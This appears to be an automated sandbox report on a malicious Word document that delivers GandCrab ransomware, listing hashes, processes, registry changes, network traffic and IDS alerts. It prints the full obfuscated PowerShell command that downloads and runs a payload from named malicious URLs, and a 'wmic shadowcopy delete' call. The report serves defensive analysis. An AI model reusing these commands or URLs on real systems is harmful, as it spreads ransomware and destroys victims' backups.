File name: | dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09.doc |
Full analysis: | https://app.any.run/tasks/10aab670-7c39-40b3-99dc-69cf886bf76f |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 14, 2019, 07:24:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 1B737B8B7CE22967D2D4CDEDF7DC210D |
SHA1: | DAF8C25D857FBC6E4D9D9B205C98338D54679485 |
SHA256: | DD27B85624CAC5B98F2670E1636C0B1787ECB088126D072F58DFB67C76D0FD09 |
SSDEEP: | 1536:Wq+PpgnKZXGdythQh/zkq9D4aqFrvlUmz8qtBvNL:1+Da37kq9zqYVqtBvNL |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | admin |
Subject: | - |
Title: | - |
ModifyDate: | 2019:03:13 15:23:00Z |
---|---|
CreateDate: | 2019:03:13 14:16:00Z |
RevisionNumber: | 4 |
LastModifiedBy: | Admin |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1637 |
ZipCompressedSize: | 427 |
ZipCRC: | 0x7df6b578 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3352 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3620 | c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG); | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2196 | powershell $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2804 | "C:\windows\temp\6.exe" | C:\windows\temp\6.exe | powershell.exe | |
User: admin Company: djsoft.net (c) 2003-2015 Integrity Level: MEDIUM Description: Nullable Arsenals Identifier Addpackage | ||||
2900 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | 6.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3448 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | {z' |
Value: 7B7A2700180D0000010000000000000000000000 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1315831829 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831948 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831949 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 180D000064B3D4F936DAD40100000000 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 3{' |
Value: 337B2700180D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | 3{' |
Value: 337B2700180D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3352) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE5B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2196 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TICKNALOV45BQYOLKB5O.temp | — | |
MD5:— | SHA256:— | |||
3352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\444BFB91.jpeg | — | |
MD5:— | SHA256:— | |||
3352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF005B71D948E4689C.TMP | — | |
MD5:— | SHA256:— | |||
3352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF0FD2368D010CA5D4.TMP | — | |
MD5:— | SHA256:— | |||
3352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7422A9E7-034D-49EB-99D1-AD49E2551BDC}.tmp | binary | |
MD5:79D502F8AC11D7C50E398EB513313ED0 | SHA256:EDA5931769D00AAC3B3FF66200C18F486ACF958482AADDE84E2BE472F5A45740 | |||
2804 | 6.exe | C:\$Recycle.Bin\CCQYGCTH-MANUAL.txt | text | |
MD5:75605FD6997E336E96B65251B6A48CAB | SHA256:3E53C55FE2FE20F3EDC15A3413C7F0448483DD0A3D01BE581800673BDA873871 | |||
3352 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AA5738B9E16777C4C18E864CE7F89ACF | SHA256:53CAEC48FC57EAC4376C396650901150F88B6FC413653D997853B0068A4AF01E | |||
2804 | 6.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
2804 | 6.exe | C:\Config.Msi\CCQYGCTH-MANUAL.txt | text | |
MD5:75605FD6997E336E96B65251B6A48CAB | SHA256:3E53C55FE2FE20F3EDC15A3413C7F0448483DD0A3D01BE581800673BDA873871 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2196 | powershell.exe | GET | 200 | 185.61.154.3:80 | http://nagiah.website/word.exe | GB | executable | 674 Kb | malicious |
2804 | 6.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2804 | 6.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2804 | 6.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
2196 | powershell.exe | 185.61.154.3:80 | nagiah.website | Namecheap, Inc. | GB | malicious |
Domain | IP | Reputation |
---|---|---|
nagiah.website |
| malicious |
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2196 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2196 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2196 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2804 | 6.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2804 | 6.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2804 | 6.exe | A Network Trojan was detected | MALWARE [PTsecurity] GandCrab v.5 SSL Connection |